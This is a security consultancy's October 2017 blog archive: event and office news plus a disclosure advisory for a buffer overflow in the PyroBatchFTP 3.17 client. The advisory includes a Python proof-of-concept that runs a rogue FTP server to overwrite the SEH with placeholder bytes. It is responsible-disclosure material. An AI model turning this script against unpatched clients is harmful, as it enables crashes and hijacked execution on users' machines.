Archives for October 2017

Fraud and Breach Prevention Summit

Fraud & Breach Prevention Summit: London (17th and 18th October)

7 Elements are proud to be a sponsor of this year’s Fraud & Breach Prevention Summit in London.

We believe this summit is important in bringing the topic of security breaches into the public conscious. As an information security consultancy delivering incident response capability for our clients, we are well placed to see the rising numbers of breaches.

Breaches happen to all types organisation regardless of size or industry and it is important to know how to deal with them effectively.

Our CEO, David Stubley, will be taking part in the following two panels and presenting on the topic of incident response:

  • ‘We’ve Been Breached: Now What? How to Effectively Work with Law Enforcement’
    15:20 on the 17th of October. The panel will discuss the importance of planning when it comes to incident response and working proactively with law enforcement.
  • ‘Equifax Breach: Long-term Implications. What Does It Mean for Europe?’
    16:05 on the 17th of October. The panel will discuss the long-term implication of the Equifax breach and the lessons that all organisations should learn from it.
  • In ‘Disaster Strikes: Here’s Your Incident Response Playbook’, David will discuss the five core principles all organisations should apply when responding to an incident. The talk will take place at 12:55 on the 18th of October.

Office Move and Expansion

The past few weeks have been a busy period for the team at 7 Elements. Behind the scenes we have recently moved our Scotland office to the Oracle Campus in Linlithgow, and extended our UK wide coverage by establishing a 7E presence within London.

Scotland

Our Scotland based team will still be the primary point of contact for all engagements, and the new office details can be found here.

 

 

 

 

 

London

Our expansion into London is in partnership with Scottish Enterprise and the Scottish Government, with 7 Elements using the prestigious Scotland House as our London base. We are working on some exciting events that we will be hosting at Scotland House, so watch this space for future news and invitations.

Further reading from ScotSoft 2017

Following David’s presentation “Breaking Bad – Season Two” at ScotSoft 2017, this post contains the remediation advice and further reading notes on the matters presented.

[Read more…]

CVE-2017-15035 PyroBatchFTP Buffer Overflow (SEH Overwrite)

Advisory Information

Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)

Date Published: 04/10/2017

Advisory Summary

It is possible to cause a buffer overflow in PyroBatchFTP when a client connects to an FTP server with an excessively long current directory string.

Vendor

Emtec

Affected Software

Product Version
PyroBatchFTP 3.17

Description of Issue

A buffer overflow vulnerability was discovered in the PyroBatchFTP client version 3.17. This vulnerability occurs after successfully connecting to an FTP server with a current directory string of longer than 2265 characters. It is also possible to overwrite the Structured Exception Handler (SEH) and potentially hijack execution flow of the application.

PoC

The following proof of concept python script will initialise an FTP server on the host system.
Connecting to the FTP server using PyrobatchFTP will trigger the buffer overflow.


#!/usr/bin/python

print "Pyro FTP Buffer Overflow (SEH) Server"

#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk 
#Vendor Website: https://www.emtech.com

import socket 
import sys

buffer="A"*2292+ "B"*4+"C"*4+"D"*800 
port = 21

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        s.bind(("0.0.0.0", port))
	s.listen(5)
	print("[+] FTP server started on port: "+str(port)+"\r\n")
except: 
	print("[+] Failed to bind the server to port:"+str(port)+"\r\n")
while True:
	conn, addr = s.accept()
	conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n') print(conn.recv(1024))
	conn.send("331 OK\r\n")
	print(conn.recv(1024))
	conn.send('230 OK\r\n')
	print(conn.recv(1024))
	conn.send('220 "'+buffer+'" is current directory\r\n')

SEH Overwrite
 

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of PyroBatchFTP can be found on the EmTec website.

Timeline

Reported – 16th September 2017

Vendor Response – 18th September 2017

Update Requested – 3rd October 2017

Vendor Response and Patch – 4th October 2017

Advisory Published – 4th October 2017